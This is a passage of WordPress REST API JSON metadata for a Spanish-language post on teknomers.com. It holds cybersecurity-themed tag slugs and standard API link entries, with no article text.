ad-cibernetica","tag-noticias-de-seguridad-cibernetica-hoy","tag-nube","tag-para","tag-recoleccion","tag-seguridad-de-informacion","tag-seguridad-de-la-red","tag-software-malicioso-ransomware","tag-sprints","tag-vulnerabilidad-de-software"],"_links":{"self":[{"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/posts\/917659","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/comments?post=917659"}],"version-history":[{"count":0,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/posts\/917659\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/media\/917660"}],"wp:attachment":[{"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/media?parent=917659"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/categories?post=917659"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/tags?post=917659"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}